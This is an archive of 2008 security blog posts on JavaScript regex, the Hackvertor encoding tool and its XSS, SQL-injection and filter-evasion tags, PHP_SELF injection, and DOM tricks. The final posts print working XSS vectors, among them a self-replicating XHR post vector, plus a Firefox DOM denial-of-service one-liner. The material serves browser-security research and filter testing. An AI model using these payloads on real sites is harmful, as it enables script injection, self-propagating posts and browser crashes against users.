Skip to content

Javascript regular expressions

Ronald and I had a good conversation about Javascript regular expressions comparing them to PHP. He was having difficultly with the syntax because he was used to preg in PHP so I promised to share my knowledge gained from developing various online scripts.

First up preg_match in PHP can be achieved using the match function in Javascript, they are both very similar but it’s just a matter of getting your head round the different syntax. Match is part of the String object and here is how to use it:-

alert('Test'.match(/[a-z]/))

You can match subpatterns like this (I’ve tried to keep it close to PHP syntax as possible):-

pattern = /([a-z]+)([0-9]+)([A-Z]+)/;
subject = 'test1234TEST';
matches = subject.match(pattern);
match1 = matches[1];
match2 = matches[2];
match3 = matches[3];
alert(match1);
alert(match2);
alert(match3);

You can also create matches using the RegExp object, this is useful for passing variables into the pattern which to my knowledge isn’t possible with “//” syntax.

a = 'a+';
alert(new RegExp(a).exec('123aaaabcdef'));

The exec method can also be called from “//” patterns.

alert((/[0-9]+/).exec('12345abcdef'))

Javascript supports the modifiers “g”, “i” and “m”, here’s how to use them with “//” syntax:-

matches = 'ababababababa'.match(/[a]/g);
alert(matches);
alert(matches.length);

Here’s how to use modifiers with the RegExp object:-

alert(RegExp('[test]+','i').exec('TeSt'))

Ok I hope you’re following so far, I’m going to move onto replace now and how to use the various combinations.

Here’s how to use replace, notice how only one “t” is replaced:-

str = 'test';
alert(str.replace('t','x'))

In order to match more than one instance of the string and use a regular expression you have to do the following:-

alert('test'.replace(/t/g,'x'))

Javascript also supports anonymous functions within replace which is really powerful, you can even nest the replaces and perform other logic:-

alert('teeest'.replace(/e+/g, function(str) {
  return str.replace(/e/g,'x');
}));

You can also use parenthesis with replace and match the subpatterns like this:-

alert('567'.replace(/([0-9])([0-9])([0-9])/,'$3$2$1'));

That’s all for now I may follow up this article at a later date when I have some spare time, I hope you enjoyed it.

Posted 01 February 2008 Gareth Heyes § Security § javascript § php § regular expressions Comments (3)

Google payloads

Description

Google has a cool free service for hosting open source projects which allows you to manage your source code over svn. You can also view the contents anonymously but because some files directly output their contents it’s possible to use this service to host malicious server reflected attacks. The lack of any form of CAPTCHA also makes it easy for an attacker to automate this process.

POC

The following proof of concept uses the anonymous feature to include a HTML file which really contains javascript:-
Google payload poc

Recommendation

All file types should be forced to download when viewing their contents anonymously

Posted 30 January 2008 Gareth Heyes § Security Comments (2)

Unicode half and full width conversion

I’ve been reading a lot about unicode over the past few weeks and I decided to add full/half conversion into Hackvertor as a learning exercise. It’s useful for testing IDS systems because certain web servers automatically convert the characters into the normal ASCII range.

Check it out here:-
Unicode demo

You can even assign a custom prefix to the conversion allowing you to produce urlencoded escapes or javascript escapes, a demo of that is available here:-
Custom prefix

Update..

Modified the prefixes slightly to allow hex entities as well:-
Entity demo

Another update..

It supports direct conversion of characters now:-
Direct conversion

Posted 23 January 2008 Gareth Heyes § Security § hackvertor Comments (3)

Code morphing

I’ve been working on a small project with the eventual goal of producing random morphing javascript. It’s still early stages at the moment but I’d thought I’d release it now because then I might get some motivation to improve it. I plan to add this functionality into Hackvertor as well as Spambam in future.

At the moment the script has multiple modes, the random mode selects parts of the source to encode and the other modes allow you to continually encode Javascript. The main problem with continually encoding is that the size of the source increases each time, I’ve had some great suggestions from Ronald, Mario and sirdarckcat and I plan to incorporate these into the next release.

Bugs

This is early code so there are quite a few bugs, the random mode doesn’t work all the time because some encoding methods return errors. Variables mode doesn’t work correctly yet as there’s a slight bug. I also need to improve the regular expressions for matching functions and then encoding with unicode. The unicode mode will also support double or maybe even triple encoding using multiple evals to return the desired string, this might take a bit of work to do but I think it will be worth it :)

Check it out here:-
Code morpher

Posted 21 January 2008 Gareth Heyes § Security § javascript § xss Comments (4)

Hackvertor update

Future plans

I’ve done a big change in the Hackvertor code to pave the way for some new features. In future I plan to create a web service were we can create/share Hackvertor tags for free. This will enable custom versions of Hackvertor for a specific task, for example we could have a SQL injection version, XSS version etc and they could all be developed and improved by the community. When the server side stuff is completed that’s what you can look forward to :)

Restructure

For now though I’ve restructured all tags into their own object for easy storage, most tags now extend the native String object to make reuse between tags much easier. This makes tag code much shorter because conversions can be chained together like ”.tobinary().zeroFill(16) etc. Using these methods I decided to create my own UTF-7 encode/decode tags [1] in javascript as a technical exercise to understand how UTF-7 works.

I’ve also redone the parameter options which now allow quotes; this enables Hackvertor tags to pass commas as arguments. The option menu has also been removed because more tags now have arguments it makes it much easier to customise each tag usage rather than searching through options.

In case you hadn’t noticed Hackvertor now takes external input, which allows you to share tags between friends and provide conversion examples or md5 hashes [2] for example. This can be accessed by simply clicking the HVURL button and it will base64 encode the current input and create you a HVURL to share.

Docs and examples

It’s quite complicated now and I’ve tried to reduce the clutter and make it as accessible as possible, the DOM object browser is now hidden by default to allow both input and output windows to be displayed next to each other and increased in size.

Tag parameters/arguments

Some tags accept additional options which are displayed in () when adding a tag, for example it’s possible to change if a hex_ent (hex entities) tag adds a semi-colon or not. To include commas in a parameter you need to enclose it with quotes, take the replace tag for example:-
Replace tag example

Tag list

Here I shall document each tag category and provide a example from each.

Encode (Converts every character in a string to the chosen encoding)

  • base64 - Base64 encode a string (Uses Firefox’s native functions)
  • hex_ent - Create Hexadecimal HTML entities from the string.
  • dec_ent - Decimal HTML entities
  • dec - Converts each character into a decimal escape
  • hex - Creates a javascript hexadecimal string.
  • uni - Converts to javascript unicode string.
  • oct - Octal encoding
  • urlenc - Javascript escape wrapper (Performs a standard urlencode)
  • realurlenc - Custom urlencoder (Encodes all characters)
  • htmlent - Converts standard HTML entities
  • utf7 - Creates a UTF-7 encoded string to be used with character set attacks.

realurlenc tag example

Decode (Decodes a string that has been encoded)

  • d_base64 - Decodes a base64 encoded string using Firefox’s native functions
  • d_bin - Converts from binary
  • d_dec - Decodes decimal escapes/HTML entities
  • d_hex - Decodes hex entites or hex javascript escapes
  • d_uni - Decodes unicode strings
  • d_oct - Decodes octal escapes
  • d_enc - Unescape wrapper (Decodes urlencoded string)
  • d_realenc - Clone of d_enc tag added for clarity
  • d_htmlent - Decode HTML entities
  • 0d_utf7 - Decodes a UTF-7 encoded string

d_oct example

Filter Evasion (Tags used to test and bypass XSS filters)

  • backslashesc - Javascript/CSS backslash escapes to obscure identifiers or functions
  • backslashnulles - Same as above but with additional null characters
  • backslashnzullesc - Same as above but with zero padded nulls
  • toternary - Converts any string into a javascript ternary statements, each character is a separated and the entire string is enclosed in a anonymous function.

backslashesc example

String (String manipulation tags, javascript based functionality with additional extras)

  • javachar - Converts the string into Java lang character codes
  • tocharcodes - Converts to standard character codes
  • fromcharcodes - Convert from character codes (separated with commas)
  • dquote - Add double quotes to a string
  • squote - Add single quotes to a string
  • bticks - Adds backticks around a string
  • js2str - Executes a javascript statement and returns the string
  • stripnewlines - Removes new lines
  • ucfirst - Converts the first letter of every word to uppercase
  • upper - Converts to uppercase
  • lower - Converts to lowercase
  • mixed - Mixed case letters
  • find - Find a string using regular expressions
  • replace - Replaces the string with the arguments given
  • splitjoin - Splits the string into pieces and then joins it together with the arguments specified.
  • splitjointag - Same as above only instead of joining a character you can join with a tag
  • repeat - Repeat the content of a tag specified in the argument amount
  • reverse - Reverses the text
  • length - Returns the length of the enclosed string
  • substr - Return parts of the string specified in the arguments

Split join tag example (First parameter is the string to split, second is the join character and third is the tag to surround the result)

Fuzzing (Random character generation tags)

  • randchars - Return a random set of characters with the amount specified in a parameter
  • randnum - Same as above with numbers
  • randletters - Random letters
  • randletternums - Random letters and numbers
  • nullents - Return a random null html entity character (Can be used to obscure function calls etc)

Random characters example

Hashing (Performs hashing functions on a string)

  • md4 - Performs a MD4 hash of a string
  • md5 - Performs a MD5 hash of a string
  • sha1 - Performs a sha1 hash of a string
  • sha2 - Performs a sha2 hash of a string
  • hmac_md4 - Performs a hmac_md4 hash of a string uses a argument for the hmac key
  • hmac_md5 - Performs a hmac_md5 hash of a string uses a argument for the hmac key
  • hmac_sha1 - Performs a hmac_sha1 hash of a string uses a argument for the hmac key

sha1_hmac example

Convert (Conversion tags to perform numeric or other special conversions)

  • bin - Convert the string to binary
  • hex2rgb - Convert a HTML colour to RGB
  • rgb2hex - Converts RGB colours to HTML hex colours
  • dec2hex - Converts a number to hex
  • dec2oct - Converts a number to octal

Dec2hex example

Common inputs (Tags to save time typing which are used frequently)

  • c_js - Inserts the javascript: protocol string
  • c_alert - Standard javascript alert
  • c_script - Inserts a script tag
  • c_eval - Javascript eval
  • c_link - HTML link
  • c_iframe - HTML iframe
  • c_null - Inserts a null character
  • c_tab - Inserts a tab character
  • c_newline - Inserts a new line character
  • c_maxunicode - Returns the maximum unicode character number

Tab example

XSS (Tags to be used creating XSS vectors)

  • mozbindingcss - Creates a link to a XML file in CSS which can execute javascript
  • mozbindingxml - Creates the standard XML which will execute javascript in CSS (Use in combination with the mozbindingcss tag)
  • mozbindingexpression - Creates a cross compatible CSS vector which works on IE and Firefox
  • image - Image based XSS
  • script - External js file inclusion
  • background - HTML background javascript XSS
  • backgroundcss - CSS background javascript XSS
  • cssexpression - IE CSS javascript
  • flash - Flash XSS files
  • data - Data protocol urls

mozbindingexpression example

SQL (SQL injection tags)

  • sqlchr - Separates characters into a sqlchr statement
  • sqlcomment - Creates a SQL statement with comments around letters to obscure common commands.
  • sqlchar - Converts a string to hex and char SQL function calls
  • sqlascii - Same as above but with ASCII
  • sqlor - Creates a string from separated OR statements
  • sqlhex - Creates a hex number from each character

SQL comment example

Date (Date based tags, quite sparse at the moment)

  • date2timestamp - Converts a date into a UNIX timestamp
  • timestamp2date - Converts a timestamp into a date

timestamp2date example

Encrypt (Encryption tags)

  • caesar_enc - Caesar encryption arguments specifies the key
  • morse_enc - Converts to morse code (I dunno why I’ve put this encryption but I couldn’t find a good spot for it)
  • caesar_dec - Decrypts caesar encrypted data
  • morse_dec - Decodes morse code

Morse code example

Keyboard shortcuts

CTL+SHIFT+Backspace
Clear Hackvertor

CTL+SHIFT+B
DOM Browser

CTL+SHIFT+C
Convert

CTL+SHIFT+E
Execute output

CTL+SHIFT+H
Test in HTML

CTL+SHIFT+I
Select input

CTL+SHIFT+O
Select output

CTL+SHIFT+S
Swap intput/output

CTL+SHIFT+T
Clear tags

CTL+SHIFT+U
Create URL

References

[1] UTF7
[2] MD5

Posted 17 January 2008 Gareth Heyes § Security § hackvertor § xss Comments (2)

DOM Da DOM

I’ve seen many javascript libraries on the internet like Scriptaclous and JQuery which are superb at what they do but…I wanted a nice easy reference to the DOM functions and shortcuts. So I decided to build a little helper application which will allow you to quickly lookup the required function. The code is pretty basic at the moment but it will identify objects you write in the code window and in future I plan interaction between them through the menus.

Take a look at it here:-
DOM Da DOM

Any comments or suggestions are of course welcome.

Update…

Thijs Lensselink has kindly patched the code to fix a bug. Thanks Thijs, your help is very much appreciated. I plan to update the tool soon when I’ve finished a few other projects.

Posted 14 January 2008 Gareth Heyes § DOM § Security § javascript Comments (3)

Exploiting PHP SELF

Eric Butera emailed me with a very interesting topic about protecting against PHP_SELF exploits. I thought it might be a good idea to gather a few test cases demonstrating the problem. Why PHP allows these URL’s is beyond me and it wouldn’t take much work to filter out these malicious URL’s in the PHP code.

For any of you that don’t know, it’s possible to inject code into PHP_SELF. It works by supplying a “/” after the actual PHP file then entering your desired code. I’ve done 4 test cases which show how it’s possible to inject javascript and perform a redirect on code which doesn’t filter PHP_SELF correctly.

Test case 1

Injects data into a HTTP header, although this scenario is not very likely I thought I would include it to show that even running htmlentities or htmlspecialchars won’t save you from attack completely.

Test case 2

Shows how easy it is to inject XSS into links, this is very likely as many PHP applications ofter refer to the same page to change the current action/display.

Test case 3

A search page often includes references to PHP_SELF and can be exploited as easily as links.

Test case 4

Finally I show how code can be injected directly on the page without the need to break out of anything.

The test cases can be downloaded here:-
Test cases

Posted 14 January 2008 Gareth Heyes § Security § php Comments (12)

Valid Javascript variables

I’ve put together a simple script which will use the Javascript parser to find a list of valid variables. This information is useful to know when testing XSS filters or malicious javascript detection. Using these unusual variables I’ve manged to slip Javascript passed some very clever filters including the PHPIDS and Noscript.

Check it out here:-
Variable tester

Posted 13 January 2008 Gareth Heyes § Security § javascript § xss Comments (2)

DOM DOS Firefox

Check this DOS in Firefox:-

<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">

There are many DOM related Firefox problems, this was one of the more interesting ones I found :)

Posted 09 January 2008 Gareth Heyes § Firefox § Security § dos Comments (15)

DOM for hackers

It’s amazing the stuff I’ve been finding recently, my browser has crashed more times than windoze. In this article I’ll introduce you to using the DOM for unexpected things and hacking it to your advantage. I’ve learned all this new stuff while hacking a vectors for the slackers XSS contest which is really fun.

Contents of a script tag

You can get the contents of a script tag within DOM like this:-

<script id="x">alert(document.getElementById('x').
childNodes.item(0).nodeValue)</script>

Replacing tags

It’s quite easy to replace one tag with another in ways the browser didn’t expect, check the following example:-

<form><iframe onload="parentNode.innerHTML=(s=parentNode.innerHTML)
.replace(/iframe/g,'input'),value=s" name="content"></iframe>

Posting forms

There are lots of shortcuts for posting forms with dom, here I show how to use a image tag to automatically create a form and post content.

<img src="" onerror="with(appendChild(createElement('form')))
submit(i=createElement('input'),i.name='content',i.value='1',
appendChild(i),action='post.php',method='post')">

Comment hacking

You can also get the contents of comments in DOM like this:-

<!-- test --><img src="" onerror="alert(previousSibling.nodeValue)">

Even evaluate the resulting string:-

<!-- alert('Hello') --><img src="" onerror="eval(previousSibling.nodeValue)">

Entity hacking

You can also do the same with entities :) 

&Hello<img src="" onerror="alert(previousSibling.nodeValue.replace('&',''))">

and even this:-

&iframe onload=alert(1)><img src="" onerror="innerHTML=previousSibling.nodeValue.replace('&','<')">

Self referencing code

You can get the contents of a attribute and create a self referencing tag that requires no parent:-

<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),
send('content='<img src=%22%22 onerror=%22'+attributes[0].nodeValue+'%22>')">

This example uses a XHR object to perform a post, the XHR portion of this vector was constructed by a lot of cool people on the slackers XSS contest.

Here’s another example that I discovered:-

<img src="" onerror="appendChild(cloneNode(0));alert(innerHTML)">

DOM recursion

Finally it’s also possible to make a tag clone itself onto itself:-

<img src="" onerror="appendChild(cloneNode(1))">
Posted 09 January 2008 Gareth Heyes § Security § javascript § xss Comments (8)